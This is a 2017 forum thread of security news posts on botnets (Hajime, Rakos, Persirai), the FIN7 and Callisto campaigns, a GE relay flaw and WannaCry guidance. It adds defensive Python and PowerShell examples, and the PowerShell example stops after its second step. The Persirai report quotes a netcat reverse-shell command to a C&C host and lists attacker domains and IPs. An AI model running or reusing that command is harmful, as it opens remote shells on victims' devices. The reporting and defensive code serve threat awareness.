The study was carried out by monitoring underground communities where the users often invited other members to discuss the planning outside the underground forum. 80 instant messenger applications and protocols were analyzed, of which at least five were more used.
Privacy is implemented in these applications, for example through PGP, an encryption scheme. The secure communication between users makes it difficult for authorities to gain access to the content shared between them without knowing the encryption key that generated the encoding for the session.
The most used programs by cybercriminals are ICQ, Skype, Jabber, Quiet Internet Pager, Pretty Good Privacy, Pidgin, PSI and AOL Instant Messenger (AIM).
The report shows that the use of cybercriminal communications is different among communities of different languages; below are reported the "Language Group Specific Findings". For Russians we have the following situation:
1. Jabber (28.3%)
2. Skype (24.26%)
3. ICQ (18.74%)
4. Telegram (16.39%)
5. WhatsApp (3.93%)
6. PGP (3.79%)
7. Viber (3.01%)
8. Signal (1.58%)
while for the Chinese we have the following distribution in 2016:
1. QQ (63.33%)
2. WeChat (35.58%)
3. Skype (0.44%)
4. WhatsApp (0.22%)
5. Jabber (0.31%)
6. PGP (0.13%)
7. ICQ (0.1%)
8. AOL Instant Messenger (0.08%)
“Cybercriminals can choose from a wide variety of platforms to conduct their peer-to-peer (P2P) communications.” states the report. “This choice is typically influenced by a combination of factors, which can include:
Ease of use
Country and/or Language
Security and/or anonymity concerns
Sources:
http://www.securityweek.com/many-cybercriminals-prefer-skype-communications-study
http://www.ibtimes.co.uk/skype-whatsapp-how-cybercriminals-share-hacking-tips-tricks-online-1617822
http://www.itnews.com/article/3190830/security/report-cybercriminals-prefer-skype-jabber-and-icq.html
http://www.infoworld.com/article/3190563/encryption/cybercriminals-prefer-to-chat-over-skype.html
https://www.flashpoint-intel.com/blog/cybercrime/cybercriminal-communication-strategies/

BTW...Jabber was the preferred chat of choice for the US Army intel side for years....

OUTLAW 09
04-22-2017, 08:52 AM
IoT malware clashes in a botnet territory battle
http://www.cio.com/article/3190179/security/iot-malware-clashes-in-a-botnet-territory-battle.html#
… via @CIOonline

Hajime IoT malware, is it the work of vigilante hacker?



Mirai -- a notorious malware that's been enslaving IoT devices -- has competition.
A rival piece of programming has been infecting some of the same easy-to-hack internet-of-things products, with a resiliency that surpasses Mirai, according to security researchers.
"You can almost call it Mirai on steroids," said Marshal Webb, CTO at BackConnect, a provider of services to protect against distributed denial-of-service (DDoS) attacks.
Security researchers have dubbed the rival IoT malware Hajime, and since it was discovered more than six months ago, it's been spreading unabated and creating a botnet. Webb estimates it's infected about 100,000 devices across the globe.

These botnets, or networks of enslaved computers, can be problematic. They're often used to launch massive DDoS attacks that can take down websites or even disrupt the internet’s infrastructure.
That’s how the Mirai malware grabbed headlines last October. A DDoS attack from a Mirai-created botnet targeted DNS provider Dyn, which shut down and slowed internet traffic across the U.S.
Hajime was first discovered in the same month, when security researchers at Rapidity Networks were on the lookout for Mirai activity. What they found instead was something similar, but also more tenacious.
Like Mirai, Hajime also scans the internet for poorly secured IoT devices like cameras, DVRs, and routers. It compromises them by trying different username and password combinations and then transferring a malicious program.

However, Hajime doesn’t take orders from a command-and-control server like Mirai-infected devices do. Instead, it communicates over a peer-to-peer network built off protocols used in BitTorrent, resulting in a botnet that's more decentralized -- and harder to stop.
"Hajime is much, much more advanced than Mirai," Webb said. "It has a more effective way to do command and control."
Broadband providers have been chipping away at Mirai-created botnets, by blocking internet traffic to the command servers they communicate with. In the meantime, Hajime has continued to grow 24/7, enslaving some of the same devices. Its peer-to-peer nature means many of the infected devices can relay files or instructions to rest of the botnet, making it more resilient against any blocking efforts.

Who's behind Hajime? Security researchers aren't sure. Strangely, they haven't observed the Hajime botnet launching any DDoS attacks -- which is good news. A botnet of Hajime's scope is probably capable of launching a massive one similar to what Mirai has done.
"There's been no attribution. Nobody has claimed it," said Pascal Geenens, a security researcher at security vendor Radware.
However, Hajime does continue to search the internet for vulnerable devices. Geenens' own honeypot, a system that tracks botnet activity, has been inundated with infection attempts from Hajime-controlled devices, he said.
So the ultimate purpose of this botnet remains unknown. But one scenario is it'll be used for cybercrime to launch DDoS attacks for extortion purposes or to engage in financial fraud.
"It's a big threat forming," Geenens said. "At some point, it can be used for something dangerous."
It’s also possible Hajime might be a research project. Or in a possible twist, maybe it's a vigilante security expert out to disrupt Mirai.
So far, Hajime appears to be more widespread than Mirai, said Vesselin Bontchev, a security expert at Bulgaria's National Laboratory of Computer Virology.
However, there's another key difference between the two malware. Hajime has been found infecting a smaller pool of IoT devices using ARM chip architecture.
That contrasts with Mirai, which saw its source code publicly released in late September. Since then, copycat hackers have taken the code and upgraded the malware. Vesselin has found Mirai strains infecting IoT products that use ARM, MIPS, x86, and six other platforms.
That means the clash between the two malware doesn’t completely overlap. Nevertheless, Hajime has stifled some of Mirai’s expansion.
"There's definitely an ongoing territorial conflict," said Allison Nixon, director of security research at Flashpoint.
To stop the malware, security researchers say it's best to tackle the problem at its root, by patching the vulnerable IoT devices. But that will take time and, in other cases, it might not even be possible. Some IoT vendors have released security patches for their products to prevent malware infections, but many others have not, Nixon said.
That means Hajime and Mirai will probably stick around for a long time, unless those devices are retired.
"It will keep going," Nixon said. "Even if there's a power outage, [the malware] will just be back and re-infect the devices. It's never going to stop."

davidbfpo
04-22-2017, 12:21 PM
A number of posts have appeared recently in another thread, which advertise malware and other nasty IT things and they deserve their own thread. So I will move a dozen or so posts here, all of them by Outlaw09 who works in the cyber arena. Accordingly this post will drop from being first.:wry:

OUTLAW 09
04-29-2017, 09:07 AM
IMPORTANT for providers of critical infrastructure....


Severe vulnerability in GE Multilin SR poses a serious threat to Power Grid
Security experts discovered a critical vulnerability in GE Multilin SR that poses a serious threat to the power grid worldwide. A team of researchers from New York University has found a serious vulnerability in some of GE Multilin SR protection relays...
The experts will provide further details about the vulnerability at the upcoming Black Hat conference in Las Vegas; below is an excerpt from the abstract published on the conference website.
"Essentially, we completely broke the homebrew encryption algorithm used by these protection and management devices to authenticate users and allow privileged operations," explained the experts in their abstract. "Knowledge of the passcode enables an attacker to completely pwn the device and disconnect sectors of the power grid at will, locking operators out to prolong the attack."
The experts will also present a live demo showcasing exploitation of the vulnerability during their talk, anticipating that an attack leveraging the issue would have a significant impact on a nation.
The ICS-CERT published a security advisory on this threat, which was tracked as CVE-2017-7095.
An attacker can obtain the password either from the front LCD panel or via Modbus commands and use it to gain unauthorized access to vulnerable products.
"Successful exploitation of this vulnerability may allow a remote attacker to obtain weakly encrypted user passwords, which could be used to gain unauthorized access to affected products." reads the advisory.
“Cipher text versions of user passwords were created with a non-random initialization vector leaving them susceptible to dictionary attacks. Cipher text of user passwords can be obtained from the front LCD panel of affected products and through issued Modbus commands.”

The following versions of GE Multilin SR relays are affected by the flaw:
750 Feeder Protection Relay, firmware versions prior to Version 7.47,
760 Feeder Protection Relay, firmware versions prior to Version 7.47,
469 Motor Protection Relay, firmware versions prior to Version 5.23,
489 Generator Protection Relay, firmware versions prior to Version 4.06,
745 Transformer Protection Relay, firmware versions prior to Version 5.23, and
369 Motor Protection Relay, all firmware versions.
GE has promptly released firmware updates that fix the vulnerability for most of the above products. The firmware updates for 369 Motor Protection Relays are expected to be released in June.
To mitigate the vulnerability GE recommends that users apply updated firmware versions to affected products, as well as implement the following best practices:
Control access to affected products by keeping devices in a locked and secure environment,
Remove passwords when decommissioning devices,
Monitor and block malicious network activity, and
Implement appropriate network segmentation and place affected devices within the control system network, behind properly configured firewalls. Protection and Control system devices should not be directly connected to the Internet or business networks.
While the recent disruptions to Ukraine’s energy supply have clearly demonstrated that attacks on the power grid are a reality, it’s not uncommon for cybersecurity researchers to exaggerate the impact of their findings. It remains to be seen exactly how easily this flaw can be exploited after more information is made available.
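An added illustration of the advisory's root cause (my own code, not the researchers', GE's, or the relay's real algorithm, which is not disclosed here): with a constant initialization vector the same password always encrypts to the same bytes, so stored ciphertexts can be matched against a precomputed table, whereas a per-record random IV, or better a salted iterated hash, removes that property. The toy cipher and the key are constructed stand-ins.

```python
import hashlib
import secrets

# Constructed toy cipher (NOT the relay's undisclosed algorithm): XOR the
# password with a keystream derived from the key and the IV. It exists only
# to show what a constant IV does to stored ciphertexts.
def _keystream(key: bytes, iv: bytes, length: int) -> bytes:
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + iv + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def toy_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    stream = _keystream(key, iv, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, stream))

FIXED_IV = bytes(16)  # the "non-random initialization vector" case

def store_fixed_iv(key: bytes, password: bytes) -> bytes:
    """Ciphertext the way the advisory describes: the same IV every time."""
    return toy_encrypt(key, FIXED_IV, password)

def store_random_iv(key: bytes, password: bytes) -> bytes:
    """Fresh IV per encryption, prepended so a verifier can recompute it."""
    iv = secrets.token_bytes(16)
    return iv + toy_encrypt(key, iv, password)

def is_deterministic(store, key: bytes, password: bytes) -> bool:
    """True when storing the same password twice yields identical records,
    i.e. when one precomputed table of ciphertexts would match all of them."""
    return store(key, password) == store(key, password)

def duplicate_groups(records) -> int:
    """Number of distinct ciphertexts shared by more than one record.
    Under a fixed IV, users who chose the same password are exposed as a
    group; under a random IV the count is zero regardless of reuse."""
    counts = {}
    for r in records:
        counts[r] = counts.get(r, 0) + 1
    return sum(1 for c in counts.values() if c > 1)

# Mitigation from first principles: do not store reversible ciphertext at
# all. A salted, iterated hash per user makes equal passwords look different
# and forces any guessing to be repeated per record.
def hash_password(password: bytes, salt: bytes = b"") -> bytes:
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password, salt, 100_000)
    return salt + digest

def verify_password(stored: bytes, candidate: bytes) -> bool:
    salt, digest = stored[:16], stored[16:]
    probe = hashlib.pbkdf2_hmac("sha256", candidate, salt, 100_000)
    return secrets.compare_digest(probe, digest)

if __name__ == "__main__":
    key = b"constructed-demo-key"
    print("fixed IV deterministic:", is_deterministic(store_fixed_iv, key, b"admin"))
    print("random IV deterministic:", is_deterministic(store_random_iv, key, b"admin"))
```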

OUTLAW 09
05-01-2017, 04:32 PM
According to the experts from security firm FireEye, the financially-motivated FIN7 group is changing hacking techniques.


The group has been active since late 2015, and was recently spotted targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations with a new PowerShell backdoor dubbed POWERSOURCE.

The FIN7 group has adopted new phishing techniques, leveraging hidden shortcut files (LNK files) to compromise targets.

Experts from FireEye highlighted that attacks were launched by FIN7 group and not the Carbanak Group as suspected by other security experts.

“FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7.” reads the analysis published by FireEye. “FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.”

Experts from FireEye distinguish the activity associated with the FIN7 group to the one attributed to CARBANAK.

Security experts discovered a string of fileless malware attacks last month that have been powered by the same hacking framework.

The latest attacks attributed to FIN7 did not use weaponized Microsoft Office macros; the hackers switched to hidden shortcut files (LNK files) as an attack vector to launch "mshta.exe". FIN7 then used the VBScript functionality launched by mshta.exe to compromise the victim's system.

“In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.” reads the analysis.

Hackers leveraged on spear phishing emails using malicious DOCX or RTF files, each being a different variant of the same LNK file and VBScript technique.

The DOCX and RTF files attempt to convince the user to double-click included images.

“both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document” states the analysis.

FIN7 group campaign

“In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique.”

The ongoing campaign targeted large restaurant chains, hospitality, and financial service organizations, threat actors used phishing messages themed as complaints, catering orders, or resumes. To improve the efficiency of the campaign the FIN7 hackers were also calling the targets to make sure they received the email.

According to the experts, this new phishing scheme is more effective than previous ones.

“Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object. By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action,” state the researchers.

Hackers used a multilayer obfuscated PowerShell script that once launched executes shellcode for a Cobalt Strike stager. The shellcode downloads an additional payload from a specific C&C server using DNS aaa.stage.14919005.www1.proslr3[.]com, if the reply is successful, the PowerShell executes the embedded Cobalt Strike.

The FIN7 group also used the HALFBAKED backdoor in the ongoing attacks.

FireEye researchers examined the shortcut LNK files created by the attackers, which revealed valuable information about the attackers' environment.

One of the LNK files used by hackers in the last campaign revealed some specific information about the attackers, for example, that the hackers likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.
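The infection chain described above (LNK launches mshta.exe, VBScript hands off to PowerShell, the stager resolves a staging hostname) is what a defender would watch for in endpoint telemetry. The detector below is an added example of mine, not FireEye's code; the events are constructed in a Sysmon-like shape and are not real logs, and the only page-derived value is the staging name.

```python
import re

# Constructed sample telemetry (not real logs). Process records carry image,
# parent image and command line; DNS records carry the querying image and the
# name looked up. The mshta command line is a placeholder, not FIN7's script.
SAMPLE_EVENTS = [
    # the user double-clicks the lure image: the hidden LNK runs mshta
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe vbscript:Execute("placeholder")'},
    # the VBScript stage hands off to obfuscated PowerShell
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc AAAA"},
    # the stager resolves the staging name quoted on the page
    {"type": "dns",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "query": "aaa.stage.14919005.www1.proslr3[.]com"},
    # benign activity that must not fire
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe"},
    {"type": "dns",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "query": "www.update.microsoft.com"},
]

def _name(path: str) -> str:
    """Case-insensitive basename of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def rule_mshta_from_explorer(ev) -> bool:
    # mshta started from the shell is how a double-clicked LNK lure looks
    return (ev["type"] == "process" and _name(ev["image"]) == "mshta.exe"
            and _name(ev["parent"]) == "explorer.exe")

def rule_mshta_inline_script(ev) -> bool:
    # mshta given a script: URI on its command line rather than an .hta file
    return (ev["type"] == "process" and _name(ev["image"]) == "mshta.exe"
            and re.search(r"\b(vbscript|javascript):", ev.get("cmdline", ""), re.I)
            is not None)

def rule_powershell_from_mshta(ev) -> bool:
    return (ev["type"] == "process" and _name(ev["image"]) == "powershell.exe"
            and _name(ev["parent"]) == "mshta.exe")

def rule_staging_lookup(ev) -> bool:
    # PowerShell resolving a deep hostname with an all-numeric label, the
    # shape of the DNS staging name described on the page
    if ev["type"] != "dns" or _name(ev["image"]) != "powershell.exe":
        return False
    labels = ev["query"].lower().replace("[.]", ".").split(".")
    return len(labels) >= 5 and any(label.isdigit() for label in labels)

RULES = [
    ("mshta_from_explorer", rule_mshta_from_explorer),
    ("mshta_inline_script", rule_mshta_inline_script),
    ("powershell_from_mshta", rule_powershell_from_mshta),
    ("staging_lookup", rule_staging_lookup),
]

def detect(events):
    """Return (rule_name, evidence) for every event that matches a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((name, ev.get("cmdline") or ev.get("query")))
    return hits

if __name__ == "__main__":
    for name, evidence in detect(SAMPLE_EVENTS):
        print(f"{name}: {evidence}")
```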

OUTLAW 09
05-01-2017, 04:45 PM
The Hacking Team hack involved a data breach of over 600 GB of data..tools...source code and emails....all posted on the net for review and use...

The Callisto APT Group borrowed the source code leaked by hackers that broke into Hacking Team network.


According to F-Secure Labs, The Callisto APT Group used the HackingTeam leaked surveillance software to gather intelligence on foreign and security policy in eastern Europe and the South Caucasus.

The Callisto APT group targeted government officials, military personnel, journalists and think tanks since at least 2015.

F-Secure is still investigating the case; the experts of the company reported that the Callisto Group's infrastructure has links with entities in China, Russia, and Ukraine. The researchers speculate the attacker is a nation state actor:

“It is worth noting that during our investigation we uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances.” reads the report published by F-Secure. “While the targeting would suggest that the main benefactor of the Callisto Group’s activity is a nation state with a specific interest in the Eastern Europe and South Caucasus regions, the link to infrastructure used for the sale of controlled substances hints at the involvement of a criminal element. Finally, the infrastructure associated with the Callisto Group and related infrastructure contain links to at least Russia, Ukraine, and China in both the content hosted on the infrastructure, and in WHOIS information associated with the infrastructure.”

The Callisto APT Group was involved in highly targeted phishing attacks using a malware that is a variant of the Scout tool from the RCS Galileo developed by the surveillance firm HackingTeam.

The code of the surveillance tool was leaked online after hackers broke into the Hacking Team network. F-Secure experts believe the Callisto Group did not utilize the leaked RCS Galileo source code, but rather attackers used the leaked readymade installers to set up their own installation of the RCS Galileo platform.

“The process for using the leaked installers to set up an RCS Galileo installation has been described online in publicly available blogposts, making the process trivial to achieve” continues the report. “In all known malicious attachments, the final payload was a variant of the “Scout” tool from the HackingTeam Remote Control System (RCS) Galileo hacking platform.”

According to the experts, the Callisto APT continues to be active; they observed the last malware in February 2016, and meanwhile the group continues setting up new phishing infrastructure on a weekly basis.

Let me suggest reading the report on the Callisto APT Group that is full of interesting info, including IoCs and mitigation strategies.

OUTLAW 09
05-03-2017, 08:11 PM
CRITICAL


PSA: someone is spreading a massive Gmail phishing email right now. DO NOT CLICK on the Google Doc link.
https://motherboard.vice.com/en_us/article/massive-gmail-google-doc-phishing-email

(Added by Mod) or http://www.independent.co.uk/life-style/gadgets-and-tech/google-phishing-emails-attack-gmail-scam-link-doc-invitation-hack-a7716581.html

OUTLAW 09
05-04-2017, 07:28 AM
In other infosec news, German bank hackers used SS7 hijacking to steal SMS 2FA tokens and drain accounts [in German]

http://www.sueddeutsche.de/digital/it-sicherheit-schwachstelle-im-mobilfunknetz-kriminelle-hacker-raeumen-konten-leer-1.3486504

European and US telco providers have known about this major issue since 2014 and failed to implement stronger available security features.....and we are now in 2017....

I would be interested to know if this is a coincidence with the Trend Micro report on Friday, or someone making an OAUTH bomb after reading it.

OUTLAW 09
05-04-2017, 07:40 AM
Reference the Google Gmail phishing attack yesterday.....

Shout out to @Google security ppl who got the #OAuthWorm disabled in under an hour and to @Cloudflare for sinkholing. Great response.

Was the attack actually generated after reading the Trend Micro report on the Russian state sponsored French hacking of Macron using OAuth?

Not clear who's behind the attack, but conspicuously similar MO to a major APT28 campaign last year disclosed by Trend Micro last Friday.

This big phishing attack is clever; an OAUTH based attack. Tricks you into giving "permission" to read your emails to a fake Google Docs app.

Password Alert is a free Chrome extension that journalists (or anyone) can use to protect against phishing
https://goo.gl/vrIEkA #WPDF2017

A good video of the actual attack in progress....

https://twitter.com/zachlatta/status/859843151757955072

OUTLAW 09
05-11-2017, 08:30 AM
Apple has recently fixed an iCloud Keychain vulnerability that could have been exploited by hackers to steal sensitive data from iCloud users.

The flaw allowed hackers to run man-in-the-middle (MitM) attacks to obtain sensitive user information (i.e. names, passwords, credit card data, and Wi-Fi network information).

The researcher Alex Radocea of Longterm Security discovered in March a vulnerability tracked as CVE-2017-2448 that affects the iCloud Keychain

OUTLAW 09
05-11-2017, 08:33 AM
http://securityaffairs.co/wordpress/58931/malware/p2p-transient-rakos-botnet.html

A really great article..well worth reading for those that follow this type of infomation....

The Rakos botnet – Exploring a P2P Transient Botnet From Discovery to Enumeration
May 10, 2017 By Pierluigi Paganini


1. Introduction
We recently deployed a high interaction honeypot expecting it to be compromised by a specific malware. But in the first few days, instead of getting infected by the expected malware, it received a variety of attacks ranging from SSH port forwarding to "Viagra and Cialis" SPAM to XORDDoS failed deployment attempts. By the third day, it was insistently hit and compromised by Rakos, a Linux/Trojan.
Based on the expected Rakos behavior reported last December by ESET [1], our honeypot was recruited to a botnet and immediately began attempting connections to other hosts on the Internet, both to "call home" and to search for new victims. Although it wasn't our initial plan, we noticed that this sample didn't behave like the one ESET described, which got us curious and made us analyze it here at Morphus Labs.
After analyzing and exploiting this botnet's communication channel and employing Crawling and Sensor Injection enumeration methods, we did find a network floating around 8,300 compromised devices per day spread over 178 countries worldwide. Considering the recent DDoS attack reported by Incapsula [2] against a US College, originated from 9,793 bots, which was able to generate 30,000 requests per second during 54 hours, we may infer how potentially threatening the Rakos botnet is.
2. Botnet C&C channel analysis
To better understand this P2P Transient botnet behavior and its C&C protocol, we listened to its traffic for 24 hours, and after analyzing it, we noticed two kinds of communications: one between bots through HTTP and, the other, between bots and C&C servers through TLS/SSL. In this section, we detail the commands we mapped.
Some definitions before we start:
Checker: An infected machine (“bot”) that is part of the botnet.
Skaro: C&C server
A particular node may play both roles

Continued.....


The other graph shows the real interconnection between nodes, as seen in Figure 6. Here we can see a very thick botnet where virtually all Checkers know all Skaros.
Now, plotting the discovery path graph on the world map, as seen in Figure 7, we may have an idea of the botnet worldwide. To geolocalize the nodes, we used MaxMind database [8].

OUTLAW 09
05-13-2017, 07:18 AM
New IOT Attack Linked To Iran – Persirai Malware Strikes at IP Cameras in Latest IOT Attack


Trend Micro has discovered a new attack on internet-based IP cameras and recorders. The new Internet of Things (IOT) attack called ELF_PERSIRAI has also been back-tracked to an Iranian research institute which restricts its use to Iranians only, indicating a possible state sponsored cyber strike by Tehran.
“C&C (Command and Control) servers we discovered were found to be using the .IR country code. This specific country code is managed by an Iranian research institute which restricts it to Iranians only. We also found some special Persian characters which the malware author used,” stated Trend Micro in its discovery release posted online.
IP Camera users have also encountered the malware attack and noted its point of origin appears to be Iran.
“Hello found the following text on my 2 ip cameras (nc load.gtpnet.ir 1234 -e /bin/sh) and wondering who does that domain belong to? All I know is it is an iranian address nothing on whois. Ive obviously been hacked one of these cameras was in the kids room,” stated one user in the Reddit hacking forum.
The attack is based on the previously successful Mirai IOT strike against IP cameras that was used to disrupt the Internet with a giant Denial of Service (DOS) attack in 2016. However, while over 120,000 IP camera systems appear to be infected, over 30% of the Persirai targets are inside China with only small fraction located outside of the PRC; in Italy (3%), the UK (3%) and the USA (8%).
The Persirai attack is disturbing on a number of fronts. Its base on the open-source Mirai strike shows that the freely available source code will be modified by attackers to strike again in different forms. Persirai is also very stealthy, leaving most camera owners unaware that their systems are infected.
Yet, the worst feature is that the command and control computers used to run the malicious bot-net are using the country code of IR or Iran. Infected IP cameras report to command servers at:

load.gtpnet.ir
ntp.gtpnet.ir
185.62.189.232
95.85.38.103

The Persirai attack installs itself and then deletes the installation files to hide its presence on the target camera, running in memory only. It then proceeds to download and install additional control software and blocking software. Once communications are established with the command and control network server, the infected camera is then ordered to search for other cameras and infect them as well.

Persirai blocks other zero-day exploits from gaining access to a targeted IP Camera by pointing ftpupdate.sh and ftpupload.sh to /dev/null, preventing other attacks. This feature may be an effort to prevent duplicate attacks by Persirai as much as to prevent other bot-net attackers from gaining control of the now captured IP Camera. The fact that Persirai is running in memory does mean it is also eliminated once the IP Camera is rebooted but, unless the user takes counter-measures, the targeted system will still be vulnerable to the exploit.

While Trend Micro advises IP Camera users to use strong passwords, the Persirai attack is not dependent on a password attack, nor does it appear to steal passwords. A better counter-measure is to disable Universal Plug and Play (UPnP) features on your router. Universal Plug and Play (UPnP) is a network protocol that allows devices such as IP Cameras to open a port on the router and act like a server. This feature also makes the attached devices highly visible targets for the Persirai malware attack.
Users can also simply remove their IP Camera systems from Internet access altogether and then set up a private VPN service to allow them to log into the cameras remotely. Users are also advised to update the firmware on their IP Cameras and maintain a close inspection of any web address linked activity.
The Persirai attack is part of a new trend to strike at the Internet via devices not traditionally viewed as computers. These malware strikes illustrate the issue of vendors selling hardware with little or no security. There are no current regulations or standards for IOT device security. Consumers are literally left on their own and frequently choose low cost systems which have no security features such as encryption or even manufacturer updates.
While many IOT users are aware enough to update their computers and cell phones with the latest software and perform anti-virus checks, they are not aware that other devices such as cameras, washing machines, refrigerators and DVR recorders may also require security checks. Even DVD players and smart TVs from major manufacturers are vulnerable to exploits as illustrated by the Wikileaks release of the WEEPING ANGEL attacks developed by the CIA in co-operation with the UK's GCHQ spy agency which attacked Samsung TVs.
Details from Trend Micro on Persirai:
http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/

OUTLAW 09
05-13-2017, 07:27 AM
A security researcher discovered that a Conexant audio driver shipped with dozens of HP laptops and tablet PCs logs keystrokes.


Security researcher Thorsten Schroeder of security firm Modzero discovered that a Conexant audio driver shipped with many HP laptops and tablet PCs logs keystrokes. The expert discovered that the MicTray64.exe application, which is installed with the Conexant audio driver package, is registered as a scheduled task in Windows systems and is able to monitor keystrokes to determine if the user has pressed any audio-related keys (e.g. mute/unmute).

The keystrokes are logged to a file in the Users/Public folder. Furthermore, they are passed on to the OutputDebugString debugging API, allowing a process to access the data via the MapViewOfFile function.

Unfortunately, this feature can be abused to steal user data such as login credentials, a malware could access keystrokes without triggering security solutions monitoring for suspicious activities.

The researcher observed that an earlier version of the MicTray64 app released in December 2015 did not log keystrokes to a file, the dangerous feature was implemented starting from the version 1.0.0.46 released in October 2016.

"Actually, the purpose of the software is to recognize whether a special key has been pressed or released. Instead, however, the developer has introduced a number of diagnostic and debugging features to ensure that all keystrokes are either broadcasted through a debugging interface or written to a log file in a public directory on the hard-drive. This type of debugging turns the audio driver effectively into a keylogging spyware. On the basis of meta-information of the files, this keylogger has already existed on HP computers since at least Christmas 2015." Schroeder wrote in a blog post.

“There is no evidence that this keylogger has been intentionally implemented. Obviously, it is a negligence of the developers – which makes the software no less harmful,”

The flaw, tracked as CVE-2017-8360, affects 28 HP laptops and tablet PCs, including EliteBook, Elite X2, ProBook, and ZBook models. The experts at Modzero speculate other devices manufactured by other vendors that use Conexant hardware and drivers could be affected.
Users are invited to delete MicTray64 from \Windows\System32 and the MicTray.log log file from \Users\Public.

HP plans to fix the issue as soon as possible.

OUTLAW 09
05-14-2017, 06:50 AM
I find the NYT's op-ed lead line, "Microsoft should have done more for computer users other than for their legally registered customers", interesting.

This is interesting for a number of reasons... Software producers have for years complained about copyright violations, black copies, etc., and it does in the end drive up the overall cost of their products, as they factor that into their own product pricing to make up for the lost sales.

On the other hand, do software prices have to be high, as the actual cost of manufacturing millions of CDs these days is virtually nothing within the actual sales price? They argue that they must continually evolve the product, support the product and sell the product, all costs of doing business...

So should a software manufacturer be responsible for the protection of unlicensed end users who have paid nothing for the product?

Or, say, in the case of Russia, the hardest hit... an entire nation state running on illegally copied and/or stolen software? AND then MS is supposed to swallow those costs?

OUTLAW 09
05-14-2017, 08:13 AM
The latest NCSC (UK) guidance on Ransomware

The NCSC are aware of a ransomware campaign relating to version 2 of the “WannaCry” malware affecting a wide range of organisations globally. NCSC are working with affected organisations and partners to investigate and coordinate the response in the UK.

From investigations and analysis performed to date, we know that the malware encrypts files and provides the user with a prompt which includes a ransom demand, a countdown timer and a bitcoin wallet to pay the ransom into.

The malware uses the vulnerability MS17-010 to propagate through a network using the SMBv1 protocol. This enables the malware to infect additional devices connected to the same network.

The NCSC advise the following steps be performed in order to contain the propagation of this malware:
Deploy patch MS17-010:
https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

A new patch has been made available for legacy platforms, and is available here:
https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks

If it is not possible to apply this patch, disable SMBv1. There is guidance here:
https://support.microsoft.com/en-us/help/2696547

and/or block SMBv1 ports on network devices [UDP 137, 138 and TCP 139, 445]
If these steps are not possible, propagation can be prevented by shutting down vulnerable systems.

Work done in the security research community has prevented a number of potential compromises. To benefit from this, a system must be able to resolve and connect to the domain below at the point of compromise.
www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

Unlike most malware infections, your IT department should not block this domain.

Anti-virus vendors are increasingly becoming able to detect and remediate this malware, therefore updating antivirus products will provide additional protection (though this will not recover any data that has already been encrypted).

The NCSC have previously published broader guidance on protecting your organisation from ransomware.
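The NCSC steps above, carried out on a single Windows host, as an added PowerShell example (mine, not an NCSC script). It assumes Windows 8.1 / Server 2012 R2 or later for the Smb*, NetSecurity, Resolve-DnsName and Test-NetConnection cmdlets; older systems use the registry method in the KB article linked above. The two KB ids it looks for are the ones I know from the bulletin (the Windows 7 / Server 2008 R2 security-only update and the out-of-band legacy update); other Windows versions have their own ids and later rollups supersede them, so a miss means "verify", not "unpatched". The kill-switch check follows the guidance's point that the domain must stay resolvable and reachable rather than being blocked.

```powershell
# Added example, not an NCSC script: the containment steps from the guidance above,
# applied to one Windows host from an elevated PowerShell (Windows 8.1 / Server 2012 R2
# or later; older systems use the registry method in the KB article linked above).

# Step 1: MS17-010 patch check. KB ids differ per Windows version; these two are the
# Windows 7 / Server 2008 R2 security-only update and the out-of-band legacy update
# (from my knowledge of the bulletin, not from the post). Later cumulative rollups
# supersede them, so a miss means "verify against the bulletin", not "unpatched".
$ms17010Kbs = @('KB4012212', 'KB4012598')
$hotfix = Get-HotFix | Where-Object { $ms17010Kbs -contains $_.HotFixID }
if ($hotfix) { "MS17-010 update present: $($hotfix.HotFixID -join ', ')" }
else         { 'No known MS17-010 KB found: check the bulletin for this Windows version' }

# Step 2: if the patch cannot be applied, disable SMBv1 on the server side.
$smb = Get-SmbServerConfiguration
if ($smb.EnableSMB1Protocol) {
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    'SMBv1 server protocol disabled'
} else {
    'SMBv1 server protocol was already disabled'
}

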